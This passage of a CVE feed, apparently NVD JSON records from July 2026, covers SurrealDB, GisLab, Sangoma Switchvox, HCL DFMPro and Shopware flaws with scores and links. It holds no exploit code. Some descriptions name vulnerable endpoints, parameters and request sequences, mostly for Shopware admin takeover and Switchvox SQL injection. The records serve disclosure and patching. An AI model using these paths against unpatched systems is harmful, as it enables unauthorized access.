Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-129"}]}],"references":[{"url":"https://github.com/helm/helm/commit/ba6c9a29efa7bf9198dad6a5ec12b4fb30c96017","source":"disclosure@vulncheck.com"},{"url":"https://github.com/helm/helm/issues/32279","source":"disclosure@vulncheck.com"},{"url":"https://github.com/helm/helm/pull/32290","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/chat2db-insecure-direct-object-reference-via-get-api-connection-datasource","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63309","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T17:17:17.717","lastModified":"2026-07-17T18:28:39.220","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"SurrealDB before 3.1.5 fail to apply field-level SELECT permissions to ORDER BY clauses, allowing authenticated users to leak the relative ordering of restricted field values. Attackers can issue ORDER BY queries on indexed restricted fields to recover the hidden values' sort order across records, even though the field itself returns null as intended."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"surrealdb","product":"surrealdb","defaultStatus":"unaffected","repo":"https://github.com/surrealdb/surrealdb","packageURL":"pkg:cargo/surrealdb","versions":[{"version":"3.0.0","lessThan":"3.1.5","versionType":"semver","status":"affected"},{"version":"3.1.5","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:40:21.281517Z","id":"CVE-2026-63309","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/surrealdb/surrealdb/releases/tag/v3.1.5","source":"disclosure@vulncheck.com"},{"url":"https://github.com/surrealdb/surrealdb/security/advisories/GHSA-h4h3-3rfj-x6fq","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/surrealdb-information-disclosure-via-order-by","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-8297","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T17:17:17.860","lastModified":"2026-07-17T17:54:18.640","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Gis Informatics Engineering Consulting Laboratory R&D and Software Services Inc. GisLab Laboratory Management System allows SQL Injection.\n\nThis issue affects GisLab Laboratory Management System: from 1.4.03 through 08072026."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Gis Informatics Engineering Consulting Laboratory R&D and Software Services Inc.","product":"GisLab Laboratory Management System","defaultStatus":"unaffected","versions":[{"version":"1.4.03","lessThanOrEqual":"08072026","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:38:15.234899Z","id":"CVE-2026-8297","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0573","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2026-9585","sourceIdentifier":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","published":"2026-07-17T17:17:17.990","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An unauthenticated reflected cross-site scripting (XSS) vulnerability exists in Sangoma Switchvox SMB Edition version 8.3 (104997). The application fails to properly sanitize the portal parameter supplied to the invalid_browser and invalid_browser_login handlers. User-supplied data is reflected into JavaScript generated by the application, allowing attacker-controlled script execution within a victim's browser."}],"affected":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","affectedData":[{"vendor":"Sangoma","product":"Switchvox SMB Edition","defaultStatus":"unaffected","versions":[{"version":"8.3 (104997)","lessThan":"8.4.0.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:39:05.608957Z","id":"CVE-2026-9585","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://labs.sra.io/posts/switchvox/","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"},{"url":"https://sangomakb.atlassian.net/wiki/spaces/Switchvox/pages/1802371073/Switchvox+-+Release+Notes+Version+8.4.0.2+July+14+2026","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"}]}},{"cve":{"id":"CVE-2026-9586","sourceIdentifier":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","published":"2026-07-17T17:17:18.150","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An unauthenticated SQL injection vulnerability exists in Sangoma Switchvox SMB Edition 8.3 (104997). The /pa endpoint processes XML content beginning with <PolycomIPPhone> and directly concatenates the user-controlled PhoneIP value into PostgreSQL queries without sanitization or parameterization. An unauthenticated remote attacker can execute arbitrary SQL statements against the backend PostgreSQL database using a single crafted request, including database operations and remote code execution."}],"affected":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","affectedData":[{"vendor":"Sangoma","product":"Switchvox SMB Edition","defaultStatus":"unknown","versions":[{"version":"8.3 (104997)","lessThan":"8.4.0.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:42:54.524029Z","id":"CVE-2026-9586","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://labs.sra.io/posts/switchvox/","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"},{"url":"https://sangomakb.atlassian.net/wiki/spaces/Switchvox/pages/1802371073/Switchvox+-+Release+Notes+Version+8.4.0.2+July+14+2026","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"}]}},{"cve":{"id":"CVE-2026-9587","sourceIdentifier":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","published":"2026-07-17T17:17:18.280","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An authenticated local file inclusion vulnerability exists in Sangoma Switchvox SMB Edition 8.3 (104997). The play_file functionality accepts user-controlled input through the sound_path parameter and fails to properly validate file paths before accessing the underlying filesystem. By supplying absolute paths, an authenticated attacker can retrieve files outside the intended directory scope."}],"affected":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","affectedData":[{"vendor":"Sangoma","product":"Switchvox SMB Edition","defaultStatus":"unaffected","versions":[{"version":"8.3 (104997)","lessThan":"8.4.0.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:42:28.788088Z","id":"CVE-2026-9587","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","description":[{"lang":"en","value":"CWE-73"}]}],"references":[{"url":"https://github.com/sangoma/security-switchvox/security/advisories/GHSA-mhp4-x83p-phh2","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"},{"url":"https://labs.sra.io/posts/switchvox/","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"}]}},{"cve":{"id":"CVE-2026-9588","sourceIdentifier":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","published":"2026-07-17T17:17:18.413","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A stored cross-site scripting (XSS) vulnerability exists in Sangoma Switchvox SMB Edition 8.3 (104997) within the voicemail notification template functionality. The submit_modify_voicemail_template endpoint fails to properly sanitize HTML content supplied by authenticated users, allowing malicious JavaScript supplied through the template_text parameter to be stored server-side and subsequently rendered to other users."}],"affected":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","affectedData":[{"vendor":"Sangoma","product":"Switchvox SMB Edition","defaultStatus":"unaffected","versions":[{"version":"8.3 (104997)","lessThan":"8.4.0.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.0,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:41:57.552881Z","id":"CVE-2026-9588","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://labs.sra.io/posts/switchvox/","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"},{"url":"https://sangomakb.atlassian.net/wiki/spaces/Switchvox/pages/1802371073/Switchvox+-+Release+Notes+Version+8.4.0.2+July+14+2026","source":"57dba5dd-1a03-47f6-8b36-e84e47d335d8"}]}},{"cve":{"id":"CVE-2025-59866","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T18:17:12.643","lastModified":"2026-07-17T18:30:38.987","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"The HCL DFMPro, DFXAnalytics and DFXServer installers are affected by ‘Insecure file permissions Leading to Privilege Escalation’ vulnerability, which enables any logged-in non-administrative user to overwrite or replace the executable file with a malicious binary."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"DFMPro for CATIA","defaultStatus":"unaffected","versions":[{"version":"v4.1","status":"affected"}]},{"vendor":"HCLSoftware","product":"DFXAnalytics","defaultStatus":"unaffected","versions":[{"version":"v3.1","status":"affected"}]},{"vendor":"HCLSoftware","product":"DFXServer","defaultStatus":"unaffected","versions":[{"version":"v3.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N","baseScore":3.3,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":0.8,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:52:38.090814Z","id":"CVE-2025-59866","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-732"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132365","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2026-48008","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:15.713","lastModified":"2026-07-17T20:17:19.337","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Shopware is an open commerce platform. Prior to 6.6.10.18 and 6.7.10.1, a non-admin API user with integration:create ACL privilege can escalate to full administrator by creating an integration with admin: true through the Sync API POST /api/_action/sync; the regular integration endpoint POST /api/integration blocks this, but SyncController::sync() routes writes through SyncService to EntityWriter::upsert(), and src/Core/Framework/Integration/IntegrationDefinition.php lacks WriteProtection on the admin field. This issue is fixed in versions 6.6.10.18 and 6.7.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shopware","product":"shopware","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]},{"vendor":"shopware","product":"platform","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:47:42.338187Z","id":"CVE-2026-48008","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/shopware/shopware/commit/1e047f6d7fd9129271e28c1c9f1c272983c6f48f","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/db5adff33ec30b648979cd1938c87f164f7b3073","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.6.10.18","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.7.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/security/advisories/GHSA-gv8p-48fr-4fxg","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48009","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:15.863","lastModified":"2026-07-17T20:17:19.973","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Shopware is an open commerce platform. Prior to 6.6.10.18 and 6.7.10.1, a low-privilege admin user with user_recovery:read ACL can take over any admin account by triggering POST /api/_action/user/user-recovery, reading the password recovery hash through POST /api/search/user-recovery, and using PATCH /api/_action/user/user-recovery/password; the root cause is that src/Core/System/User/Recovery/UserRecoveryDefinition.php exposes the hash field through the Admin API without ApiAware(false) or ReadProtection. This issue is fixed in versions 6.6.10.18 and 6.7.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shopware","product":"shopware","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]},{"vendor":"shopware","product":"platform","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:07:28.860336Z","id":"CVE-2026-48009","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"references":[{"url":"https://github.com/shopware/shopware/commit/06f8b9aa4fecb239a2ff33a6546192d7ce7ed0f8","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/9ef4873f810e26fb38da051624f7f2720139279a","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/d82c23d8d5b22dd722c8f76c4f66785d1a7a72d8","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.6.10.18","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.7.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/security/advisories/GHSA-8v9p-g828-v98f","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48010","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:16.023","lastModified":"2026-07-18T00:16:48.220","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Shopware is an open commerce platform. Prior to 6.6.10.18 and 6.7.10.1, UserController::upsertUser() in src/Core/Framework/Api/Controller/UserController.php writes raw user data in SYSTEM_SCOPE without filtering the admin field, so a non-admin API user with user:create or user:update ACL permission can set admin: true on new or existing users; IntegrationController::upsertIntegration() contains an isAdmin() check for the same field, but UserController was missing this check. This issue is fixed in versions 6.6.10.18 and 6.7.10.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shopware","product":"shopware","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]},{"vendor":"shopware","product":"platform","versions":[{"version":"< 6.6.10.18","status":"affected"},{"version":">= 6.7.0.0, < 6.7.10.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T21:09:22.885956Z","id":"CVE-2026-48010","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-269"}]}],"references":[{"url":"https://github.com/shopware/shopware/commit/7f1cef324ca4edfa6369264cc1c41287d032624d","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/commit/d8d9a34a9255abf69c2798015a17cd6a80b08c25","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.6.10.18","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/releases/tag/v6.7.10.1","source":"security-advisories@github.com"},{"url":"https://github.com/shopware/shopware/security/advisories/GHSA-v39m-97p8-gqg7","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48014","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T18:17:16.177","lastModified":"2026-07-17T18:30:01.357","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Shopware is an open commerce platform. Prior to 6.6.10.18 and 6.7.10.1, the order state 